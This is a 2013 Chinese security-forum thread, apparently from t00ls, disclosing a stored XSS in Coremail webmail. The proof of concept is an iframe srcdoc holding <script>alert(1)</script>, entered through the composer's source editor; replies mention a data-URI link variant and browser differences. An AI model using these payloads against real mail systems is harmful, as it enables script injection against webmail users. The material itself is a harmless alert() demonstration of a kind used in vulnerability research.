来个coremail XSS 0day

2013-06-15 11:20:23 9 lusiyu 4241

coremail 神马东西不用说了

写邮件时源码编辑
<iframe srcdoc='<script>alert(1)</script>
'>

chrome下XSS 成功

类别 Web安全

关于作者

lusiyu7篇文章238篇回复

评论9次

要评论？请先登录或注册

9楼

stephen
2013-7-7 12:11

IE8试试

回复|@ta|踩(0)|顶(0)
8楼

粉丿丶兜兜
2013-6-23 23:17

应该是怎么显示的啊你直接用代码方式粘贴不就行了不要普通粘贴

回复|@ta|踩(0)|顶(0)
7楼

web安全测试
2013-6-20 16:35

这个好啊我们能做些什么啊

回复|@ta|踩(0)|顶(0)
6楼

t00ls管理团队01
2013-6-15 23:17

截个图传个图片吧。

回复|@ta|踩(0)|顶(0)
5楼

lusiyu
2013-6-15 22:05

单引号内输入的是实体字符但给显示成字母了。

回复|@ta|踩(0)|顶(0)
4楼

t00ls管理团队01
2013-6-15 11:30

只针对chrome？土司哪里显示有问题？

回复|@ta|踩(0)|顶(0)
3楼

lusiyu
2013-6-15 11:23

这个漏洞也不难找

回复|@ta|踩(0)|顶(0)
2楼

lusiyu
2013-6-15 11:22

<a href="data或者实体字符“>点我</a>能够通杀所有浏览器但不够主动

回复|@ta|踩(0)|顶(0)
1楼

lusiyu
2013-6-15 11:21

土司显示不正确单引号里面都是实体字符的

回复|@ta|踩(0)|顶(0)

热门文章

渗透测试溯源小技巧（邮箱、域名、电话、qq）

前言：我写的是一些简单的溯源，就分享一下知识### 邮箱溯源IP这 ...

2024-02-02 17:34:00 84 4330

渗透测试真实学院渗透思路分享

通过搜索引擎语法对目标学校进行信息搜集找到专升本信息，可以看 ...

2024-04-07 15:40:08 75 2366

安全资讯Apex Legends 玩家担心 ALGS 黑客攻击后存在 RCE 缺陷

ALGS 是一个电子竞技锦标赛系列，玩家可以在快节奏的战略大逃杀 ...

2024-03-21 03:31:36 6 986

安全资讯号外号外！大家一定来看看！GitHub 骗局诱骗开发人员下载恶意软件

Checkmarx在与 The Hacker News 分享的一份报告中表示，开源软件 ...

2024-04-11 12:11:31 10 786

安全资讯XZ Utils 库中发现秘密后门，影响主要的 Linux 发行版

Red Hat周五发布了一个“紧急安全警报”警告，称一个名为XZ Util ...

2024-04-01 09:19:22 7 867

精华推荐

渗透测试获取访客QQ号示例, 只是其中一种方法

首先我要说两句:@抚菊深思 @godblack你们两个先把承诺的30JB以及 ...

2013-12-10 13:30:02 36 972

渗透测试Bypass 护卫神SQL注入防御（多姿势）

###0x00 前言护卫神一直专注服务器安全领域，其中有一款产品 ...

2018-06-02 11:44:04 25 28268

手机无线我是如何随时随地控制全校宿舍楼大门的

表弟才疏学浅，边百度边写的PHP。文章是以一个新手的视角来写的 ...

2016-12-16 23:23:53 28 1430

渗透测试【庆新春】--->>验证码绕过及识别专题

又是一年来到，身在t00ls我感到很高兴。两年前搞采集时候学的东 ...

2017-01-08 09:02:57 82 2719

渗透测试T00LS Metasploit系列教程（第二季)

时光飞逝，转眼间新的一年已经到来了，在今天这个特殊的日子里祝 ...

2015-01-01 11:39:59 317 7235

Top ↑